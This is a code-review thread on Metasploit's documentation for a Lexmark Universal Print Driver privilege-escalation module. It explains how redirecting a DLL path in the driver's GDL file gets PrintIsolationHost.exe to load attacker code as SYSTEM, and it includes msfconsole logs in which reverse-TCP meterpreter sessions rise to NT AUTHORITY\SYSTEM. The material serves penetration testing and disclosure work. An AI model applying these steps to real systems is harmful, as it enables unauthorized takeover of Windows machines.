Lexmark Universal Print Driver Local Privilege Escalation (#15519)
rapid7/metasploit-framework: documentation/modules/exploit/windows/local/lexmark_driver_privesc.md

## Vulnerable Application

Various Lexmark Universal Printer drivers as listed at [advisory TE953](http://support.lexmark.com/index?page=content&id=TE953)
allow low-privileged authenicated users to elevate their privileges to `SYSTEM` on affected Windows systems by modifying
the XML file at `C:\\ProgramData\\<driver name>\\Universal Color Laser.gdl` to replace the DLL path

> to `LMUD1OUE.DLL` with a malicious DLL path.

Reviewer: This is going to need to be updated to `unires.dll` now that we changed the name of the file we are replacing.

When `C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs` is then used to add the printer
to the affected system, `PrintIsolationHost.exe`, a Windows process running as `NT AUTHORITY\SYSTEM`,

> will inspect the ``C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl` file and will load the

Reviewer: ```suggestion
will inspect the `C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl` file and will load the
```

Reviewer: ```suggestion
will inspect the ``C:\\ProgramData\\<driver name>\\Universal Color Laser.gdl` file and will load the
```

> ## Vulnerable Application

Reviewer 2: We have a `msftidy_docs.rb` tool to lint the markdown docs. If you wouldn't mind, could you please address it's comments:
```
tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/lexmark_driver_privesc.md 
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:25 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:26 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:27 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:34 - [WARNING] Code blocks using triple backquotes (```) should not be indented
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:94 - [WARNING] Code blocks using triple backquotes (```) should not be indented
```

The other thing is that each of the sections are indented when they don't need to be. In particular the scenarios section's indentation is then copied over into the rendered markdown output.

![image](https://user-images.githubusercontent.com/58950994/128547220-cc870a63-b739-4a4c-a2af-17be1fc2e8fc.png)

## Vulnerable Application

> [Various Lexmark printer drivers](http://support.lexmark.com/index?page=content&id=TE953) allow escalation of privileges on Windows systems.

Reviewer: Eh technically according to the advisory isn't it various Lexmark Universal Print Drivers? Also tie this into the following paragraph more to build up a more cohesive story. I've given an example below.

```suggestion
Various Lexmark Universal Print drivers, as listed at the [TE953 advisory page](http://support.lexmark.com/index?page=content&id=TE953) allow local authenticated users to elevate privileges to `SYSTEM` by overwriting the XML file XXXXX, which causes XXXX to happen when a printer driver is installed, thereby elevating user's permissions.
```

Reviewer: Created a more detailed explanation at https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960, but feel free to let me know if this doesn't work. Marking resolved.

For vulnerable drivers, a low-privileged user can
modify an XML configuration file and replace a

> DLL path with a malicious DLL path.

Reviewer: Which achieves what exactly? Modifying an XML file isn't exactly a vulnerability in and of itself. Explain to me why modifying this XML file has such significance and tie in with the following paragraphs so that I see why this is significant. Otherwise it just looks like a simple modification of some XML file and nothing more, and I'm pretty sure given this gives `SYSTEM` there is a lot more going on here that could be explained.

Reviewer: Resolved with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

`PrintIsolationHost.exe`, a Windows process running
as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
during the installation of a printer. A user can
elevate to SYSTEM by writing a malicious DLL to
the vulnerable configuration file and adding a new
printer with a vulnerable driver.

> 

Reviewer: Overwriting a configuration file with a DLL doesn't seem to be whats happening here. Are you not adjusting an XML configuration file to point to the malicious DLL that you drop on the target? It seems unlikely that simply replacing a configuration file with a DLL file would lead to the DLL being loaded into memory in a correct manner.

Reviewer: Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

This module leverages the `prnmngr.vbs` script
to add and delete printers.

## Verification Steps

> 1. Install a vulnerable Lexmark driver
> 2. Start msfconsole
> 3. Get a session with basic privileges
> 4. Do: `use exploit/windows/local/lexmark_driver_privesc`
> 5. Do: `set SESSION <sess_no>`
> 6. Do: `run`
> 7. You should get a shell running as SYSTEM.

Reviewer: ```suggestion
1. Install a vulnerable Lexmark driver
2. Start `msfconsole`
3. Get a session with basic privileges
4. Do: `use exploit/windows/local/lexmark_driver_privesc`
5. Do: `set SESSION <sess_no>`
6. Do: `run`
7. You should get a shell running as `SYSTEM`.
```

Reviewer: Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

## Scenarios

> ### Tested with Lexmark Universal Print Driver v2 `v2.10.0.5`

Reviewer: ```suggestion
### Lexmark Universal Print Driver v2.10.0.5
```

Reviewer: Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.8:1270 
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:50356) at 2021-08-04 16:01:23 -0400

meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use lexmark_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

> 
> Matching Modules
> ================
> 
>    #  Name                                          Disclosure Date  Rank    Check  Description
>    -  ----                                          ---------------  ----    -----  -----------
>    0  exploit/windows/local/lexmark_driver_privesc  2021-07-22       normal  Yes    Lexmark Driver Privilege Escalation
> 
> 
> Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/lexmark_driver_privesc
> 

Reviewer: ```suggestion
```

Reviewer: This seems to be extra output from some other command that got mismashed into this for some reason.

Reviewer: Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

[*] Using exploit/windows/local/lexmark_driver_privesc
msf6 exploit(windows/local/lexmark_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/lexmark_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/lexmark_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/lexmark_driver_privesc) > run

[*] Started reverse TCP handler on 10.0.0.8:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Lexmark GDL file is present
[*] Adding printer dnvCihT...
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:50382) at 2021-08-04 16:03:23 -0400
[*] Deleting printer dnvCihT

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

## Options

> 

Reviewer: This options should occur earlier on in the documentation. Run `tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/lexmark_driver_privesc.md` and fix the errors it reports.

Author: The msftidy report is clean. Is there a different command line option I should use? Or perhaps you could tell me where in the documentation you believe this belongs?

Reviewer: Huh odd, so normally this would go after the `Verification Steps` like https://github.com/rapid7/metasploit-framework/pull/15462/files does, however I thought `msftidy_docs.rb` was checking the order of things as usually if you place the headings out of order it will complain.

Reviewer: Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960
